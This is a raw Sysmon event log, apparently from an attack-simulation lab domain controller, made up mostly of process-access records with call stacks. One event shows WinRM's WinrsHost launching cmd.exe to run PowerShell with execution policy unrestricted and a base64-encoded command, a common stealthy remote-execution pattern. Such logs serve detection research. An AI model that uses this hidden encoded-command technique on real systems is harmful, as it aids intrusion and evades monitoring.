10341000x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E6F-6005-8200-00000000A301}46964752C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.577{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.501{59A5CD1D-8E46-6005-1400-00000000A301}13041784C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.485{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8200-00000000A301}4696C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8300-00000000A301}4708C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.470{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 